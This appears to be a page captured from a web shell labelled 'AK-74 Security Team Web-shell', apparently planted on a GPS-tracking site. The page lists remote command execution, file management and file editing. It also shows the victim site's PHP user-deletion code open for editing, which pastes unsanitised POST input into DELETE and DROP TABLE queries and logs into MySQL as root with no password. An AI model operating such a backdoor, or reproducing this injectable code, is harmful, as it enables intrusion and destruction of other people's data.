.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<? if (@$_POST['cmd'] == 'user_delete') { $con = mysqli_connect("localhost", "root", "", "gs"); $id = $_POST["id"]; $q = "DELETE FROM `gs_users` WHERE `id`='" . $id . "'"; $r = mysqli_query($con,$q); //delete all object by agohary $str_query = "select imei FROM gs_user_objects WHERE gs_user_objects.user_id='" . $id . "'"; $result = mysqli_query($con, $str_query); $iemis = array(); $index = 0; while ($row = mysqli_fetch_array($result)) { // loop to give you the data in an associative array so you can use it however. $iemis[$index] = $row; $index++; } foreach ($iemis as $iemi) { $q = "DROP TABLE IF EXISTS gs.gs_object_data_" . $iemi['imei'] . ""; $r = mysqli_query($con, $q); delObjectSystem($iemi['imei']); } // delete user sub users $q = "DELETE FROM `gs_users` WHERE `privileges` LIKE '%subuser%' AND `manager_id`='" . $id . "'"; $r = mysqli_query($con, $q); $q = "DELETE FROM `gs_users` WHERE `privileges` LIKE '%subuser%' AND `manager_id`='" . $id . "'"; $r = mysqli_query($con, $q); $q = "DELETE FROM `gs_user_events` WHERE `user_id`='" . $id . "'"; $r = mysqli_query($con, $q); $q = "DELETE FROM `gs_user_events_data` WHERE `user_id`='" . $id . "'"; $r = mysqli_query($con, $q); $q = "DELETE FROM `gs_user_events_status` WHERE `user_id`='" . $id . "'"; $r = mysqli_query($con, $q); $q = "DELETE FROM `gs_zones` WHERE `user_id`='" . $id . "'"; $r = mysqli_query($con, $q); $q = "DELETE FROM `gs_markers` WHERE `user_id`='" . $id . "'"; $r = mysqli_query($con, $q); $q = "DELETE FROM `gs_user_objects` WHERE `user_id`='" . $id . "'"; $r = mysqli_query($con, $q); $q = "DELETE FROM `gs_objects_groups` WHERE `user_id`='" . $id . "'"; $r = mysqli_query($con, $q); $q = "DELETE FROM `gs_user_object_drivers` WHERE `user_id`='" . $id . "'"; $r = mysqli_query($con, $q); $q = "DELETE FROM `gs_object_cmd_exec` WHERE `user_id`='" . $id . "'"; $r = mysqli_query($con, $q); $q = "DELETE FROM `gs_user_cmd` WHERE `user_id`='" . $id . "'"; $r = mysqli_query($con, $q); $q = "DELETE FROM `gs_user_reports` WHERE `user_id`='" . $id . "'"; $r = mysqli_query($con, $q); echo 'ok'; die; } //function delObjectSystem($imei) {} function delObjectSystem($imei) { $con = mysqli_connect("localhost", "root", "", "gs"); $q = "DELETE FROM `gs_objects` WHERE `imei`='" . $imei . "'"; $r = mysqli_query($con,$q); $q = "DELETE FROM `gs_rfid_swipe_data` WHERE `imei`='" . $imei . "'"; $r = mysqli_query($con,$q); $q = "DELETE FROM `gs_object_sensors` WHERE `imei`='" . $imei . "'"; $r = mysqli_query($con,$q); $q = "DELETE FROM `gs_user_objects` WHERE `imei`='" . $imei . "'"; $r = mysqli_query($con,$q); $q = "DELETE FROM `gs_user_events_data` WHERE `imei`='" . $imei . "'"; $r =mysqli_query($con,$q); $q = "DELETE FROM `gs_user_events_status` WHERE `imei`='" . $imei . "'"; $r = mysqli_query($con,$q); $q = "DELETE FROM `gs_object_service` WHERE `imei`='" . $imei . "'"; $r = mysqli_query($con,$q); $q = "DROP TABLE gs_object_data_" . $imei; $r = mysqli_query($con,$q); } ?>
Rename:
-